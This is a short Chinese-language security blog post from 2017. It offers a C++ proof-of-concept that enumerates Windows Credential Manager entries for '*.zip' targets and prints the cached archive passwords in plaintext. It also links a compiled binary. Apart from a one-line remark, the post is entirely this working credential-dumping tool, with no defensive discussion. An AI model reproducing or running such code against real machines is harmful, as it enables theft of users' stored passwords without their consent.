MENU

Win8.x/10系统资源管理器ZIP压缩文件缓存密码获取

October 24, 2017 • Security

原理

特定环境下可能会用上

PoC

源码

#include <Windows.h>
#include <wincred.h>
#include <iostream>

using namespace std;

/*
Credential Manager – Zip archives password retrieval for Win 8.x – Win 10
*/

int main()
{

PCREDENTIALW * credBuf = NULL;

DWORD count;

CredEnumerateW(L”*.zip”, NULL, &count, &credBuf);

if (ERROR_NOT_FOUND == GetLastError())
{

wcout << endl << “No credentials found in the user’s credential set.” << endl;
goto __cleanup;

}

if (!credBuf)
{

wcout << endl << “Memory Allocation Failed!” << endl;
goto __cleanup;

}

for (DWORD i = 0; i < count; i++)
{

if (((*credBuf[i]).CredentialBlob) && ((*credBuf[i]).TargetName))
{

wcout << endl << “——————————————————” << endl;
wcout << “Target: ” << (wchar_t *)(*credBuf[i]).TargetName << endl << endl;
wcout << “Password: ” << (wchar_t *)(*credBuf[i]).CredentialBlob << endl;
wcout << “——————————————————” << endl << endl;

}

}

__cleanup:

if (credBuf)
{

CredFree(credBuf);
credBuf = NULL;

}

cin.get();
return 0;

}

编译好的文件

CredMan_ZipPassExtractor.zip

ZipPassExtractor-1.png

Archives QR Code
QR Code for this page
Tipping QR Code